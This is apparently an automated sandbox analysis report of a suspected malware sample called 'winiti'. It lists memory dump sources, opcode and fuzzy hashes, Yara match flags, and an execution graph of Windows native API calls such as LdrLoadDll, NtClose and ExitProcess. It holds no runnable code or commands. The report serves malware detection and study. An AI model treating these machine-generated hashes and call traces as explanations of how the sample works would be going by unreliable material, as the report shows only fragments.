                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                  • Instruction ID: 6ce2c52f42b6320fc470eeba76e017130972d2bd247959b7a50ec51f31982633
                  • Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                  • Instruction Fuzzy Hash: 20D017B88BE284CBCB05CB63C0449E8B76CBB0A300BA0A883881A5B202C6B09494DE40
                  Function 002E47EF Relevance: .0, Instructions: 16COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6bdb507e23728ea122b51ec9784a78cb72ddc3234a4b3f6e12a631774b8e3a37
                  • Instruction ID: 6716d5d392869eb612f4a4536c6b13829c9ec1ddd866d168883174f6bd84a7e4
                  • Opcode Fuzzy Hash: 6bdb507e23728ea122b51ec9784a78cb72ddc3234a4b3f6e12a631774b8e3a37
                  • Instruction Fuzzy Hash: 15E0177054F7C05FC70297A8C860498BF70AEB722075A9ACBD4E48A293CA16689BD752
                  Function 002E3B00 Relevance: .0, Instructions: 14COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6632a2e6dfc597a2b5d45fb4507e28bebd8eea559a7dc5002a96923725cd3f63
                  • Instruction ID: 24a67a228c53acc25e0902da79b19cc25fff255fd7ce9055a8a29f8db25fb2ba
                  • Opcode Fuzzy Hash: 6632a2e6dfc597a2b5d45fb4507e28bebd8eea559a7dc5002a96923725cd3f63
                  • Instruction Fuzzy Hash: B7D0C97190520CEF8B40EFA8DA4159EBBFDEB45200B1041A6D909E3221EF315F109B91
                  Function 002ED220 Relevance: .0, Instructions: 10COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8247d6ac79aaa48e6e152da9d8cc6ac8712d385ca4daeeb4429048be84ac5c56
                  • Instruction ID: e256895c768e82c5a1ddd34d1ac5c4c6df07cc044b63a39374acaa0332cd0c97
                  • Opcode Fuzzy Hash: 8247d6ac79aaa48e6e152da9d8cc6ac8712d385ca4daeeb4429048be84ac5c56
                  • Instruction Fuzzy Hash: B6C04C30042645CBD2162BA9FD1C329BB6CB745706F440122E54D514714B709850D666
                  Function 002E8681 Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 100b6f0d2711923a1a0f386c2313250184c853bf5a968d4059d21b6e26cfcf6a
                  • Instruction ID: 76f3777f6dac9b971e34684d412b42542c4ff7f1002577ab0e726ee5470cc9eb
                  • Opcode Fuzzy Hash: 100b6f0d2711923a1a0f386c2313250184c853bf5a968d4059d21b6e26cfcf6a
                  • Instruction Fuzzy Hash: 78C012A200E2C08FC3038B608C60800BF302D9701030E40CFC0908B0A3CB186A26D7A2
                  Function 002E8F8F Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2952c92e65845b2045a61b52cf7ca501795b035b09d83de50ec197954d483e8d
                  • Instruction ID: 4504b8dec91f5cc1e582482333e862bbf5c11751c6ab164f67f7df87b79421f6
                  • Opcode Fuzzy Hash: 2952c92e65845b2045a61b52cf7ca501795b035b09d83de50ec197954d483e8d
                  • Instruction Fuzzy Hash: 93C0123097E284CFC7218BA2D8404AC7B7AAB0A340BF0000BA06A93213CB600810EF11
                  Function 002E8F1E Relevance: .0, Instructions: 7COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 04980211103dc9a71f6a021fac2348fbf0a9aebcf9b802393f2746015543f2fb
                  • Instruction ID: f37cb712128dd22725f79d899bc37d1844550955f00ec6108286b56500e48fe3
                  • Opcode Fuzzy Hash: 04980211103dc9a71f6a021fac2348fbf0a9aebcf9b802393f2746015543f2fb
                  • Instruction Fuzzy Hash: 33C04C74D69144DFC720CBA1D4545AC7779AB0D341FB0451A902A53112C7605451DF40

                  Execution Graph

                  Execution Coverage:0.9%
                  Dynamic/Decrypted Code Coverage:4.1%
                  Signature Coverage:7.2%
                  Total number of Nodes:97
                  Total number of Limit Nodes:8
                  execution_graph 78408 42f0c3 78409 42f0d3 78408->78409 78410 42f0d9 78408->78410 78413 42e0a3 78410->78413 78412 42f0ff 78416 42c213 78413->78416 78415 42e0be 78415->78412 78417 42c22d 78416->78417 78418 42c23e RtlAllocateHeap 78417->78418 78418->78415 78419 424803 78420 42481f 78419->78420 78421 424847 78420->78421 78422 42485b 78420->78422 78423 42bee3 NtClose 78421->78423 78429 42bee3 78422->78429 78425 424850 78423->78425 78426 424864 78432 42e0e3 RtlAllocateHeap 78426->78432 78428 42486f 78430 42befd 78429->78430 78431 42bf0e NtClose 78430->78431 78431->78426 78432->78428 78505 42b4d3 78506 42b4f0 78505->78506 78509 8bfdc0 LdrInitializeThunk 78506->78509 78507 42b518 78509->78507 78510 42f1f3 78511 42f163 78510->78511 78512 42e0a3 RtlAllocateHeap 78511->78512 78514 42f1c0 78511->78514 78513 42f19d 78512->78513 78515 42dfc3 RtlFreeHeap 78513->78515 78515->78514 78521 424b93 78526 424bac 78521->78526 78522 424c3c 78523 424bf7 78524 42dfc3 RtlFreeHeap 78523->78524 78525 424c07 78524->78525 78526->78522 78526->78523 78527 424c37 78526->78527 78528 42dfc3 RtlFreeHeap 78527->78528 78528->78522 78529 413ab3 78533 413ad3 78529->78533 78531 413b3c 78532 413b32 78533->78531 78534 41b213 RtlFreeHeap LdrInitializeThunk 78533->78534 78534->78532 78433 401a64 78434 401a80 78433->78434 78437 42f593 78434->78437 78440 42db73 78437->78440 78441 42db99 78440->78441 78450 407313 78441->78450 78443 42dbaf 78449 401b69 78443->78449 78453 41af43 78443->78453 78445 42dbe3 78464 42c2b3 78445->78464 78446 42dbce 78446->78445 78447 42c2b3 ExitProcess 78446->78447 78447->78445 78452 407320 78450->78452 78467 4166d3 78450->78467 78452->78443 78454 41af6f 78453->78454 78489 41ae33 78454->78489 78457 41afb4 78459 41afd0 78457->78459 78462 42bee3 NtClose 78457->78462 78458 41af9c 78460 41afa7 78458->78460 78461 42bee3 NtClose 78458->78461 78459->78446 78460->78446 78461->78460 78463 41afc6 78462->78463 78463->78446 78465 42c2cd 78464->78465 78466 42c2de ExitProcess 78465->78466 78466->78449 78468 4166ed 78467->78468 78470 416706 78468->78470 78471 42c953 78468->78471 78470->78452 78473 42c96d 78471->78473 78472 42c99c 78472->78470 78473->78472 78478 42b523 78473->78478 78479 42b53d 78478->78479 78485 8bfae8 LdrInitializeThunk 78479->78485 78480 42b569 78482 42dfc3 78480->78482 78486 42c263 78482->78486 78484 42ca15 78484->78470 78485->78480 78487 42c280 78486->78487 78488 42c291 RtlFreeHeap 78487->78488 78488->78484 78490 41ae4d 78489->78490 78494 41af29 78489->78494 78495 42b5c3 78490->78495 78493 42bee3 NtClose 78493->78494 78494->78457 78494->78458 78496 42b5e0 78495->78496 78499 8c07ac LdrInitializeThunk 78496->78499 78497 41af1d 78497->78493 78499->78497 78500 417aa5 78501 417aa2 78500->78501 78502 417a58 78500->78502 78503 417a63 LdrLoadDll 78502->78503 78504 417a7a 78502->78504 78503->78504 78535 8bf9f0 LdrInitializeThunk

                  Executed Functions

                  Function 00417A03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 266 417a03-417a2c call 42ecc3 269 417a32-417a40 call 42f203 266->269 270 417a2e-417a31 266->270 273 417a50-417a61 call 42d663 269->273 274 417a42-417a4d call 42f4a3 269->274 279 417a63-417a77 LdrLoadDll 273->279 280 417a7a-417a7d 273->280 274->273 279->280
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_400000_winiti.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                  • Instruction ID: ee6c7ceef1adf1cf5f0f5272745ac9c454e7c3774a2bd0dbb7ae4b93fd6402ff
                  • Opcode Fuzzy Hash: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                  • Instruction Fuzzy Hash: AF015EB5E4020DABDB10DBE5DC42FDEB7789F14308F4041AAE90897240F635EB488B95
                  Function 0042BEE3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 293 42bee3-42bf1c call 404703 call 42d153 NtClose
                  APIs
                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BF17
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_400000_winiti.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                  • Instruction ID: 506154e8a8f3fb9aa3bbf7faef934b62bf1fce9cdcae224abcf988a766b44963
                  • Opcode Fuzzy Hash: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                  • Instruction Fuzzy Hash: 60E0DF362002007BC110BB5ADC01F9B739CDBC1714F00401AFA0C67241C674790486E5
                  Function 008C07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                  Function 008BF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 303 8bf9f0-8bfa05 LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                  Function 008BFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 304 8bfae8-8bfafd LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                  Function 008BFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 305 8bfb68-8bfb7d LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                  Function 008BFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                  Function 0042C263 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 205 42c263-42c2a7 call 404703 call 42d153 RtlFreeHeap
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C2A2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_400000_winiti.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID: ^gA
                  • API String ID: 3298025750-2986628814
                  • Opcode ID: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                  • Instruction ID: 94010e64c3ac40ebaa8637d687da895893a5285f039648f1696056085be2b873
                  • Opcode Fuzzy Hash: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                  • Instruction Fuzzy Hash: 7DE06DB26042047BD610EE99DC41EAB33ACEFC9710F00441AFA18A7242D674B910CAB9
                  Function 00417A83 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 253 417a83-417aa0 254 417a32-417a40 call 42f203 253->254 255 417aa2-417aa4 253->255 258 417a50-417a61 call 42d663 254->258 259 417a42-417a4d call 42f4a3 254->259 264 417a63-417a77 LdrLoadDll 258->264 265 417a7a-417a7d 258->265 259->258 264->265
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_400000_winiti.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                  • Instruction ID: 5467ce7baa1be35fd542a387db4fa72fba50a4fd1dc026b6fc6d13751b3d1b69
                  • Opcode Fuzzy Hash: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                  • Instruction Fuzzy Hash: B50124B1E04108BBDB10DBA49C52FDFBB78DF11348F1440AAE94893241F635EA05C7A1
                  Function 00417AA5 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 281 417aa5-417ab0 282 417ab2-417abb 281->282 283 417a58-417a61 281->283 286 417aa2-417aa4 282->286 287 417abd-417ac6 282->287 284 417a63-417a77 LdrLoadDll 283->284 285 417a7a-417a7d 283->285 284->285
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_400000_winiti.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 5de6b12b75050224d6ddde39596448764a2b6bb350762c52e3b39eaf53d6926f
                  • Instruction ID: 649d61dad93b3462b7384ddc33fd9c8a8ef157cfa8b9e39ff11f18283cf64051
                  • Opcode Fuzzy Hash: 5de6b12b75050224d6ddde39596448764a2b6bb350762c52e3b39eaf53d6926f
                  • Instruction Fuzzy Hash: A5F0903920811AAED710CA94CC41FDDBBB4EF45694F04479AE968971C1D631AA498785
                  Function 0042C213 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 288 42c213-42c254 call 404703 call 42d153 RtlAllocateHeap
                  APIs
                  • RtlAllocateHeap.NTDLL(?,0041E3BE,?,?,00000000,?,0041E3BE,?,?,?), ref: 0042C24F
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_400000_winiti.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                  • Instruction ID: bf3421da550d34a33725b684d4c833155ef629d3a1766f7896df30323ebfda8e
                  • Opcode Fuzzy Hash: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                  • Instruction Fuzzy Hash: C3E065B2604304BBD610EE99EC41EEB33ECEFC9754F004019FA08A7241C674B9108AB9
                  Function 0042C2B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 298 42c2b3-42c2ec call 404703 call 42d153 ExitProcess
                  APIs
                  • ExitProcess.KERNELBASE(?), ref: 0042C2E7
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_400000_winiti.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                  • Instruction ID: ca7a2a84a7f801cb252aaa35fdd09469841853465a89a090f00c38a162972b51
                  • Opcode Fuzzy Hash: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                  • Instruction Fuzzy Hash: EDE04F316442157BC610AA5ADC41FA7B76CDFC5754F50442AFA0867281C675B91187E4

                  Non-executed Functions

                  Function 008B0080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID: [Pj
                  • API String ID: 0-2289356113
                  • Opcode ID: bca995e7354d070a1e40feeb34b34d975954bc2a32c377cf7132de4718105da3
                  • Instruction ID: 68f6d44bc3608ce4ae9123466b89a13ac9dd4b5cc57358274738b7d966fcf5ff
                  • Opcode Fuzzy Hash: bca995e7354d070a1e40feeb34b34d975954bc2a32c377cf7132de4718105da3
                  • Instruction Fuzzy Hash: C9F06231208604ABD721AA10CC85F6B7BA9FFC5754F14C418F9559A2D3C7768812DB22
                  Function 008D26F8 Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
